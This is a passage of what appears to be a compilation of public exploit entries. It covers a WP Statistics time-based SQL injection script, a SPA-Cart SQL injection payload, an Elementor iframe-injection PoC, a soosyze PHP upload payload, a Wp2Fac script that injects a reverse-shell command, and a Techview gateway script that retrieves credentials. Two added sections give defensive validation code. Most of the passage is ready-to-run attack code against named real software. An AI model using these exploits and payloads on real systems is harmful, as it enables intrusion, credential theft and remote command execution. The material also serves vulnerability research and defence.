    baseUrl = args.url

    # Time-based payload injected into the unsanitised current_page_id parameter
    payload = "IF(1=1, sleep(5), 1)"

    wp_session = requests.session()
    resp = wp_session.get(baseUrl)

    # The REST nonce is embedded in the front page by the plugin's hit-tracking script
    match = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', resp.text)
    if match is None:
        print("Could not find the wp-statistics nonce on the front page; is the plugin active?")
        return
    nonce = match.group(1)
    print(f"Gathered Nonce: {nonce}")

    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"
    }
    payload = urllib.parse.quote_plus(payload)
    exploit = (
        f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={nonce}&wp_statistics_hit_rest=&browser=&platform=&version=&referred='
        f'&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11'
        f'&current_page_type=home&current_page_id={payload}&search_query&page_uri=/&user_id=0'
    )
    exploit_url = baseUrl + exploit
    print(f'\nSending: {exploit_url}')
    resp = wp_session.get(exploit_url, headers=headers)

    # A 5 second delay matches the sleep(5) in the payload
    if float(resp.elapsed.total_seconds()) >= 5.0:
        print("\n!!! Target is vulnerable !!!")
        print(f'\nTime taken: {resp.elapsed.total_seconds()}')
    else:
        print('Target is not vulnerable')


if __name__ == "__main__":
    main()

SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection

# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection
# Exploit Author: CraCkEr
# Date: 20/08/2023
# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/
# Version: 1.9.0.3
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4548
# CWE: CWE-89 / CWE-74 / CWE-707

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of data, and crashing the application or making it unavailable, leading to lost revenue and damage to a company's reputation.

Path: /search

GET parameter 'filter[brandid]' is vulnerable to SQL Injection

https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black

---
Parameter: filter[brandid] (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black
---

[-] Done

Wordpress Plugin Elementor 3.5.5 - Iframe Injection

# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection
# Date: 28.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://elementor.com/
# Version: < 3.5.5
# Tested on: Google Chrome and Firefox, latest version
# CVE : CVE-2022-4953

# 1. Description

The plugin does not filter user-controlled URLs before loading them into the DOM. This can be used to inject rogue iframes that point to malicious URLs.

# 2. Proof of Concept (PoC)

https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K

The settings parameter is base64-encoded JSON; the value above decodes to {"type":"video","url":"https://downloadmoreram.com/"}, and the lightbox loads that URL in an iframe on the victim site's origin.
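The PoC above is nothing more than a fragment that carries base64 JSON with an attacker-chosen URL. The following added Python example, mine rather than Elementor's code, decodes that fragment the way the PoC builds it and shows the check that would have blocked it: a lightbox video URL must be https and on an allowlisted host before it is loaded. The PoC URL is copied from the advisory; the host allowlist, the parse/build helpers and the other fragments are constructed for the demo and do not reproduce the plugin's actual fix.

```python
import base64
import json
from urllib.parse import unquote, urlsplit

PREFIX = "elementor-action:"

# PoC URL from the advisory above (copied, not a live target).
POC_URL = ("https://vulnerable-site.tld/#elementor-action:action=lightbox&settings="
           "eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K")

# Assumed allowlist for the demo; embedding hosts a site actually uses.
ALLOWED_VIDEO_HOSTS = {"www.youtube.com", "youtube.com", "youtu.be", "vimeo.com", "player.vimeo.com"}


def _split_params(query):
    """key=value pairs without '+'-to-space conversion, so base64 survives intact."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def parse_elementor_action(url):
    """Decode '#elementor-action:...' into (action, settings dict), or None on any error."""
    fragment = urlsplit(url).fragment
    if not fragment.startswith(PREFIX):
        return None
    params = _split_params(fragment[len(PREFIX):])
    raw = params.get("settings", "")
    try:
        padded = raw + "=" * (-len(raw) % 4)
        settings = json.loads(base64.b64decode(padded, validate=True))
    except (ValueError, UnicodeDecodeError):      # binascii.Error and JSONDecodeError are ValueErrors
        return None
    if not isinstance(settings, dict):
        return None
    return params.get("action", ""), settings


def build_elementor_action(action, settings):
    """Encode a fragment the same way the PoC does; used to construct inputs."""
    encoded = base64.b64encode(json.dumps(settings).encode()).decode()
    return f"#{PREFIX}action={action}&settings={encoded}"


def lightbox_url_is_allowed(settings, allowed_hosts=ALLOWED_VIDEO_HOSTS):
    """Accept only an https URL whose host is on the allowlist (exact match, so
    'www.youtube.com.attacker.example' and 'javascript:' are both rejected)."""
    if settings.get("type") != "video":
        return False
    url = settings.get("url")
    if not isinstance(url, str):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    return parts.scheme == "https" and (parts.hostname or "").lower() in allowed_hosts


def check_url(url, allowed_hosts=ALLOWED_VIDEO_HOSTS):
    """Return ('ignore'|'allow'|'block', decoded lightbox URL or None)."""
    parsed = parse_elementor_action(url)
    if parsed is None or parsed[0] != "lightbox":
        return "ignore", None
    settings = parsed[1]
    decision = "allow" if lightbox_url_is_allowed(settings, allowed_hosts) else "block"
    return decision, settings.get("url")


if __name__ == "__main__":
    print(parse_elementor_action(POC_URL))
    print(check_url(POC_URL))
```

The same parser doubles as a triage tool: feed it URLs harvested from a phishing campaign or referrer logs and the decoded settings show exactly which third-party URL each link would have framed.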

soosyze 2.0.0 - File Upload

## Title: soosyze 2.0.0 - File Upload
## Author: nu11secur1ty
## Date: 04.26.2023-08.28.2023
## Vendor: https://soosyze.com/
## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0
## Reference: https://portswigger.net/web-security/file-upload

## Description:
Broken file upload logic. A malicious user can put whatever he wants into an HTML file and upload it; when he then requests the file and it is executed, he can see almost all file paths of the installation (here via phpinfo()). How bad this gets depends on the scenario.

STATUS: HIGH Vulnerability

[+]Exploit:
```HTML
<!DOCTYPE html>
<html>
<head>
<title>Hello broken file upload logic, now I can read your special directory pats, thank you ;)</title>
</head>
<body>
<h1>
<?php phpinfo(); ?>
</h1>
</body>
</html>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)

## Time spend:
01:27:00
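The HTML-with-PHP payload above gets through because the upload logic trusts what the client sends. The following added Python example is mine, not soosyze's code, and shows the server-side checks that stop it: an extension allowlist, a magic-bytes check that the content matches the extension, a ban on executable inner extensions such as name.php.png, a scan for PHP open tags inside otherwise valid files, and a random stored filename so the original name never reaches the file system. The policy tables are assumptions for the demo; the HTML payload is a copy of the advisory's.

```python
import re
import secrets

# Copy of the advisory's upload payload, as bytes.
HTML_PAYLOAD = (
    b"<!DOCTYPE html>\n<html>\n<head>\n"
    b"<title>Hello broken file upload logic, now I can read your special directory pats, thank you ;)</title>\n"
    b"</head>\n<body>\n<h1>\n<?php phpinfo(); ?>\n</h1>\n</body>\n</html>\n"
)

# Assumed policy: extension allowlist with the magic bytes each file must start with.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}
# Segments that may not appear anywhere inside a name (name.php.png), because
# some web server handler mappings key off an inner extension.
EXECUTABLE_SEGMENTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "html", "htm", "svg", "js"}
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def validate_upload(filename, data):
    """Return (accepted, reason). Cheap name checks first, content checks last."""
    name = re.split(r"[\\/]", filename)[-1].strip().lower()   # drop any client-supplied path
    parts = name.split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "missing extension"
    ext = parts[-1]
    if ext not in MAGIC:
        return False, f"extension .{ext} not allowed"
    if any(seg in EXECUTABLE_SEGMENTS for seg in parts[1:-1]):
        return False, "executable inner extension"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    if PHP_OPEN_TAG.search(data):
        return False, "embedded PHP open tag"
    return True, "ok"


def stored_name(filename):
    """Random server-side name; only the (already validated) extension is kept."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    print(validate_upload("info.html", HTML_PAYLOAD))
    print(validate_upload("info.png", HTML_PAYLOAD))
    print(validate_upload("pic.png", MAGIC["png"] + b"\x00" * 16), stored_name("pic.png"))
```

Even with these checks, uploads should be stored outside the document root or in a directory where the web server has script execution disabled, so a file that slips through is served as bytes rather than run.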

Wp2Fac - OS Command Injection

# Exploit Title: Wp2Fac v1.0 - OS Command Injection
# Date: 2023-08-27
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://github.com/metinyesil/wp2fac
# Tested on: Kali Linux & Windows 11
# CVE: N/A

import requests


def send_post_request(host, revshell):
    # The 'numara' (phone number) field of send.php ends up in an OS command;
    # the '&' separators terminate the intended command and run ours.
    url = f'http://{host}/send.php'
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
        'Accept': '*/*',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With': 'XMLHttpRequest',
        'Origin': f'http://{host}',
        'Connection': 'close',
        'Referer': f'http://{host}/',
    }
    data = {
        'numara': f'1234567890 & {revshell} &;'
    }
    response = requests.post(url, headers=headers, data=data)
    return response.text


host = input("Target IP: ")
revshell = input("Reverse Shell Command: ")
print("Check your listener!")
send_post_request(host, revshell)

Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities

# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
# Google Dork: N/A
# Date: 25/08/2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
# Software Link: N/A
# Version: 1.0.19_T53
# Tested on: MACOS/Linux
# CVE : CVE-2023-34723
# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725

#!/opt/homebrew/bin/python3
import ipaddress
import os
import sys
from time import sleep

import requests
from colorama import Fore, Style, init
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


def banner():
    clr_cmd = 'cls' if os.name == 'nt' else 'clear'
    os.system(clr_cmd)
    print("[+]****************************************************[+]")
    print(" | Author : The Security Team |")
    print(" | Company : " + Fore.RED + "Exploit Security" + Style.RESET_ALL + "\t\t\t|")
    print(" | Description : TechVIEW LA-5570 Directory Traversal |")
    print(" | Usage : " + sys.argv[0] + " <target> |")
    print("[+]****************************************************[+]")


def usage():
    print(f"Usage: {sys.argv[0]} <target>")


def main(target):
    # /config/system.conf is served without authentication and contains system_password
    url = f"http://{target}/config/system.conf"
    try:
        r = requests.get(url, verify=False, timeout=3)
        print("[+] Retrieving credentials", flush=True, end='')
        for _ in range(3):
            sleep(1)
            print(" .", flush=True, end='')
        if "system_password" in r.text:
            data = r.text.split("\n")
            print(f"\n{data[1]}")
        else:
            print(Fore.RED + "[!] Target is not vulnerable !" + Style.RESET_ALL)
    except (TimeoutError, requests.exceptions.Timeout):
        print(Fore.RED + "[!] Timeout connecting to target !" + Style.RESET_ALL)
    except KeyboardInterrupt:
        return


if __name__ == '__main__':
    if len(sys.argv) > 1:
        banner()
        target = sys.argv[1]
        try:
            ipaddress.ip_address(target)   # accept only a bare IP address as the target
            main(target)
        except ValueError as e:
            print(Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)
    else:
        print(Fore.RED + "[+] Not enough arguments, please specify target !" + Style.RESET_ALL)